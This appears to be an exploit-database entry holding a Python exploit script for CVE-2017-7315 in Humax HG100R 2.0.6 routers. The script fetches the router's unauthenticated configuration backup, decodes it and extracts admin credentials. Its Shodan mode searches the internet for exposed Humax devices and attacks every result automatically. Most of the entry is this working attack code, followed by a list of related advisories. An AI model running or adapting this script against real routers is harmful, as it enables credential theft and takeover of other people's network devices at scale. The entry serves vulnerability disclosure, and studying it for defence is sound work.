Lucene search
GamblerEXPLOITPACK:D0226B478113A8436E24DC8FFB7EF658HistoryJun 30, 2017 - 12:00 a.m.
Humax HG100R 2.0.6 - Backup File Download
2017-06-3000:00:00
gambler
25
0.004 Low
EPSS
Percentile
74.8%
Humax HG100R 2.0.6 - Backup File Download
# coding: utf-8
# Exploit Title: Humax Backup file download
# Date: 29/06/2017
# Exploit Author: gambler
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-7315
import sys
import base64
import shodan
import requests
import subprocess
def banner():
print '''
āāā āā ā āā āāāā āāāāā āāā āāā āāā
āāāā āāā āā āāāāāāāāāāā āāāāāāāāā āā ā ā āā
āāāāāāāāāāā āāāāāāā āāāāāāā āāā āā ā ā
āāā āāā āāā āāāāāāā āāā āāāāāāāāā ā ā ā ā
āāāāāāāāāāāāāāāā āāāā āāāā āā āāāāāāāā āāāā
ā āāāāāāāāā ā ā ā āā ā ā āā āāāāāā ā āā ā
ā āāā āāāāā ā ā ā ā ā ā āā āāā āā ā
ā āā ā āāā ā ā ā ā ā ā ā ā
ā ā ā ā ā ā ā ā ā
'''
print 'Description: Humax HG100R backup file download'
print 'Software Version: VER 2.0.6'
print 'SDK Version: 5.7.1mp1'
print 'IPv6 Stack Version: 1.2.2'
print 'Author: Gambler'
print 'Vulnerability founded: 14/03/2016'
print 'CVE: waiting'
print
def xplHelp():
print 'Exploit syntax error, Example:'
print 'python xpl.py http://192.168.0.1'
def exploit(server):
path = '/view/basic/GatewaySettings.bin'
if not server.startswith('http'):
server = 'http://%s' % server
if server.endswith('/'):
server = server[:-1]+''
url = '%s/%s' %(server,path)
print '[+] - Downloading configuration file and decoding'
try:
r = requests.get(url, stream=True,timeout=10)
for chunk in r.iter_content(chunk_size=1024):
if chunk:
rawdata = r.content
save(rawdata)
except:
pass
def save(rawdata):
config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','')
open('config.txt', 'w').write(config)
print '[+] - Done, file saved as config.txt'
infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0]
print '[+] - Credentials found'
print infos
def shodanSearch():
SHODAN_API_KEY = "SHODAN_API_KEY"
api = shodan.Shodan(SHODAN_API_KEY)
try:
results = api.search('Copyright Ā© 2014 HUMAX Co., Ltd. All rights reserved.')
print 'Results found: %s' % results['total']
for result in results['matches']:
router = 'http://%s:%s' % (result['ip_str'],result['port'])
print router
exploit(router)
except shodan.APIError, e:
print 'Error: %s' % e
if __name__ == '__main__':
if len(sys.argv) < 2:
xplHelp()
sys.exit()
banner()
if sys.argv[1] == 'shodan':
shodanSearch()
else:
exploit(sys.argv[1])Related
prion
prion
Default credentials
2017-07-04 02:29:00
cvelist
cvelist
CVE-2017-7315
2017-07-04 02:00:00
cve
cve
CVE-2017-7315
2017-07-04 02:29:00
exploitdb
exploitdb
Humax HG100R 2.0.6 - Backup File Download
2017-06-30 00:00:00
nvd
nvd
CVE-2017-7315
2017-07-04 02:29:00
packetstorm
packetstorm
Humax Digital HG100R 2.0.6 XSS / Information Disclosure
2017-07-03 00:00:00
openvas
openvas
HUMAX Gateway Backup File Download Vulnerability
2017-07-03 00:00:00